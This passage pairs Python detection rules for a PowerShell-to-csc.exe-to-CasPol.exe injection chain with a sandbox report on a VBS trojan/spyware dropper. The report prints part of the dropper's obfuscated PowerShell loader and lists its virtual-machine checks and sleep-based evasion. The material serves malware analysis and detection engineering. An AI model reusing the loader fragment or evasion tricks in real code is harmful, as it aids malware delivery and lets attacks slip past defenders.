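CLR_UTILITY_HOSTS = {"caspol.exe"}        # the injection target seen in this tree


def _base(path: str) -> str:
    return ntpath.basename(path.strip('"')).lower()


def evaluate(ev: ProcEvent) -> list:
    """Per-event rules; the names are this example's own."""
    img, parent, cmd = _base(ev.image), _base(ev.parent_image), ev.cmdline.lower()
    hits = []
    if parent in SCRIPT_HOSTS and img == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    if len(ev.cmdline) >= LONG_CMDLINE:
        hits.append("very_long_command_line")
    if img == "csc.exe" and any(d in cmd for d in USER_WRITABLE_DIRS):
        hits.append("csc_compiles_from_user_writable_dir")   # what the report's Sigma rule flags
    if parent == "powershell.exe" and img in CLR_UTILITY_HOSTS:
        hits.append("powershell_spawns_clr_utility")
    return hits


def detect(events) -> list:
    """Flat list of (pid, rule) for every event, in input order."""
    return [(ev.pid, rule) for ev in events for rule in evaluate(ev)]


def correlate(events) -> list:
    """PIDs of powershell.exe processes that were started by a script host AND
    parented both a csc.exe-from-temp compile and a CLR utility: the loader
    pattern (Add-Type at run time, then inject) rather than three isolated hits."""
    hits = {ev.pid: set(evaluate(ev)) for ev in events}
    chains = []
    for ev in events:
        if "script_host_spawns_powershell" not in hits[ev.pid]:
            continue
        child_hits = set().union(*(hits[c.pid] for c in events if c.parent_pid == ev.pid))
        if {"csc_compiles_from_user_writable_dir", "powershell_spawns_clr_utility"} <= child_hits:
            chains.append(ev.pid)
    return chains


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\wscript.exe"
NET4 = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
# Constructed records mirroring the report's tree: PIDs and images from the
# report, the 5.5 KB command line replaced by filler of comparable size, the
# parent PID of wscript.exe and the two benign controls at the end invented.
EVENTS = [
    ProcEvent(1232, WS,
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"',
              1000, r"C:\Windows\explorer.exe"),
    ProcEvent(4760, r"C:\Windows\System32\cmd.exe", r"CMD.EXE /c echo C:\Windows", 1232, WS),
    ProcEvent(416, PS, PS + ' "$Saudiarabiske = """' + "KoAEldMedPo-" * 460 + '""";...', 1232, WS),
    ProcEvent(4292, NET4 + r"\csc.exe",
              NET4 + r'\csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline"',
              416, PS),
    ProcEvent(7836, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe",
              r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe", 416, PS),
    ProcEvent(9001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date", 1000, r"C:\Windows\explorer.exe"),
    ProcEvent(9002, NET4 + r"\csc.exe", NET4 + r'\csc.exe /noconfig @"C:\src\app\obj\Debug\app.cmdline"',
              9000, r"C:\Program Files\Microsoft Visual Studio\MSBuild.exe"),
]

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
    print("chains:", correlate(EVENTS))   # chains: [416]
```

The per-event rules alone would page on every developer box that runs csc.exe; the correlation step is what makes this actionable, because a benign compile (PID 9002 above) has neither a script-host grandparent nor a sibling CLR utility. Parent PIDs come straight from Event ID 1, so no extra data source is needed.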
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02879188
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0287E7C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0287E7D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_028796B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07BE05D7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07BE2070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07BE2062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C2F970
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C252C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C252B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C20040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C20021
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C44EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C425A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C425B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C6FCA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C6F090
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07BED639
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_00B1C0AD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1F3AD720
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1F3A4FA0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1F3A7AE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA719B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA879E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA809D2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA85128
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA8C323
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA8BB58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA864A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA8DA82
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA8DEC8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA84500
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1CFDAFDA NtQuerySystemInformation,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1CFDAFB8 NtQuerySystemInformation,
Source: PO-09784893 xlsx.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-... (obfuscated command line of PID 416; reproduced in full in the process tree above)
GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1CFDAAB6 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1CFDAA7F AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azl1colp.uti.ps1
          Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
          Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:304:WilStaging_02
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Binary string: $Pl8C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.pdb source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match | File source: 00000005.00000002.2688111783.0000000009190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.2410724852.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0287B5B0 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07BE7581 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C48FC1 push ds; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4C7A0 push DC07C33Fh; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F718 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E719 push ebx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F71B pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F6C1 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F687 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E6B8 push ebx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E6BB push ebx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F648 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F5F1 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F5B1 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F5B3 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F570 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F573 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E510 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F530 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F533 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E4D0 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E4D3 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E4F0 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E4F3 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4F491 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E451 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E453 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C48468 push ss; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C48348 push ss; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E333 push ecx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07C4E299 push ecx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
          Source: Initial file | Initial file: do while timer-temp<sec
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744 | Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7892 | Thread sleep count: 666 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7892 | Thread sleep time: -333000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Last function: Thread delayed (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9078
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Window / User API: threadDelayed 666
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 30000 (2 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | System information queried: ModuleInformation
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
          Source: wscript.exe, 00000000.00000003.1687529078.0000016C0C123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1684123875.0000016C0C120000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXznfekopperneX?
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: CasPol.exe, 0000000B.00000002.6724207212.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWN
          Source: PO-09784893 xlsx.vbs | Binary or memory string: Vi5 = Vi5 & "PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf5"
